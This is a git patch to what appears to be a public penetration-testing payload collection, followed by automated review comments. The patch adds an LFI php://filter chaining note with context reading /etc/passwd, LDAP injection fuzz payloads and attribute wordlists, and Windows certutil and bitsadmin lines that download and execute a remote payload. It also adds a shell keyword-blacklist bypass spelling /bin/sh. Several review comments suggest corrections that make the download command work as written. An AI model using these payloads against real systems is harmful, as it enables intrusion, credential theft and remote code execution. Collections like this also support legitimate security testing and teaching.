From 6bcb43e39cc84cd691257b80a35b66fb10ce5496 Mon Sep 17 00:00:00 2001 From: Swissky Date: Fri, 2 Nov 2018 13:50:56 +0100 Subject: [PATCH] LDAP fix typo + LDAP attributes + LFI filter chaining --- File Inclusion - Path Traversal/README.md | 2 ++ LDAP injection/Intruders/LDAP_FUZZ.txt | 1 + LDAP injection/Intruders/LDAP_attributes.txt | 36 ++++++++++++++----- LDAP injection/README.md | 6 ++-- .../Windows - Download and Execute.md | 7 ++++ Remote commands execution/README.md | 3 +- 6 files changed, 43 insertions(+), 12 deletions(-) diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index 375cbf7..e0cccdf 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -151,6 +151,8 @@ can be chained with a compression wrapper for large files. http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ``` +NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` + ### Wrapper zip:// ```python diff --git a/LDAP injection/Intruders/LDAP_FUZZ.txt b/LDAP injection/Intruders/LDAP_FUZZ.txt index 53b53e4..a32a116 100644 --- a/LDAP injection/Intruders/LDAP_FUZZ.txt +++ b/LDAP injection/Intruders/LDAP_FUZZ.txt @@ -29,6 +29,7 @@ x' or name()='username' or 'x'='y & ( ) +)(cn=))\x00 *(|(mail=*)) *(|(objectclass=*)) */* diff --git a/LDAP injection/Intruders/LDAP_attributes.txt b/LDAP injection/Intruders/LDAP_attributes.txt index 472a4ec..adc08bb 100644 --- a/LDAP injection/Intruders/LDAP_attributes.txt +++ b/LDAP injection/Intruders/LDAP_attributes.txt @@ -1,9 +1,27 @@ -userPassword -surname -name -cn -sn -objectClass -mail -givenName -commonName \ No newline at end of file +c +cn +co +commonName +dc +facsimileTelephoneNumber +givenName +gn +homePhone +id +jpegPhoto +l +mail +mobile +name +o +objectClass +ou +owner +pager +password +sn +st +surname +uid +username +userPassword 
diff --git a/LDAP injection/README.md b/LDAP injection/README.md index 8e33621..cdf5cec 100644 --- a/LDAP injection/README.md +++ b/LDAP injection/README.md @@ -26,6 +26,7 @@ query = (&(uid=admin)(!(&(1=0)(userPassword=q)))) * *)(& *))%00 +)(cn=))\x00 *()|%26' *()|&' *(|(mail=*)) @@ -84,7 +85,7 @@ commonName ## Exploiting userPassword attribute -userPassword’ attribute in not a string like the ‘cn’ attribute for example but it’s an OCTET STRING +`userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18). > octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit. @@ -99,4 +100,5 @@ userPassword:2.5.13.18:=\xx\xx\xx * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection) * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/) -* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/) \ No newline at end of file +* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/) +* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Download and Execute.md b/Methodology and Resources/Windows - Download and Execute.md index a675f8a..8e66c90 100644 --- a/Methodology and Resources/Windows - Download and Execute.md +++ b/Methodology and Resources/Windows - Download and Execute.md 
@@ -94,6 +94,13 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe ``` +## Bitsadmin + +```powershell +bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe +``` + + ## Thanks to - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 6e78268..a6717e9 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -87,10 +87,11 @@ Bypass blacklisted word with double quote w"h"o"am"i ``` -Bypass blacklisted word with backslash +Bypass blacklisted word with backslash and slash ```powershell w\ho\am\i +/\b\i\n/////s\h ``` Bypass blacklisted word with $@
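Review bot: the added NOTE in `File Inclusion - Path Traversal/README.md` leaves `%s` unexplained and shows a chain (`convert.base64-decode` three times over) that has nothing to do with the `zlib.deflate/convert.base64-encode` example it follows; say that `%s` stands for the resource path, that `|` separates the filters in a chain, and when a triple decode is the right chain (a resource that was base64-encoded three times), or reuse the zlib example above as the chained form. Also drop the space before the colon in "chained :" to match the rest of the file.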
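Review bot: the new entry `)(cn=))\x00` in `LDAP_FUZZ.txt` writes the null byte as the literal four characters `\x00`, whereas the README list in the same patch writes the same terminator as `*))%00`; unless the tool that loads this wordlist interprets backslash escapes, the target receives a literal backslash rather than a null byte. State in the file header (or the README) which encoding the consuming tool expects, and use it consistently.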
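Review bot: the rewritten `LDAP_attributes.txt` mixes standard LDAP attribute types (`cn`, `sn`, `uid`, `userPassword`, `objectClass`, `ou`) with application-level field names that are not directory attributes (`id`, `password`, `username`); that is acceptable for a wordlist, but a short note in the README would stop readers from expecting them in an LDAP schema. The context line `commonName` in the `LDAP injection/README.md` hunk at `@@ -84,7 +85,7 @@` suggests the README keeps its own attribute list, which this change does not update; either point the README at this file or keep the two lists in sync. The trailing newline fix on this file is welcome.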
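Review bot: the payload list in `LDAP injection/README.md` at `@@ -26,6 +26,7 @@` now carries `)(cn=))\x00` directly after `*))%00`, two different encodings of the same null-byte terminator with no explanation; add one line saying that `%00` is the URL-encoded form and `\x00` the raw-byte form so the reader knows they are the same terminator, not two separate techniques.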
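Review bot: the corrected sentence in the `## Exploiting userPassword attribute` hunk still has no terminal punctuation and keeps the curly apostrophe in `it’s` beside the newly added straight backticks; suggest `The `userPassword` attribute is not a string like the `cn` attribute, but an OCTET STRING.`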
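Review bot: the references hunk in `LDAP injection/README.md` (`@@ -99,4 +100,5 @@`) still ends with `\ No newline at end of file` after the added Maki link, even though this same patch fixes that marker in `LDAP_attributes.txt`; add the trailing newline here too so the next appended reference does not produce another one-line churn diff.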
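Review bot: the new `bitsadmin` line in `Windows - Download and Execute.md` has an empty host in `http:///xyz.exe` and doubled backslashes in `C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe`; inside a fenced block the backslashes are literal, so neither the URL nor the path is what a reader would actually type. Use the `http://webserver/` placeholder the certutil line above already uses and single backslashes. The fence is tagged `powershell` although `bitsadmin` is a standalone command-line utility, and the hunk leaves two blank lines before `## Thanks to` where the surrounding file uses one.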
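Review bot: the `w\ho\am\i` / `/\b\i\n/////s\h` block in `Remote commands execution/README.md` is tagged `powershell`, but both lines rely on POSIX shell behaviour (backslash as an escape character, redundant slashes collapsing in a path) that PowerShell does not share; tag it `bash` or `sh`. The heading now reads "backslash and slash" while the added line uses both tricks at once; a one-line note on which characters a keyword filter sees versus what the shell finally executes would make the example self-explanatory.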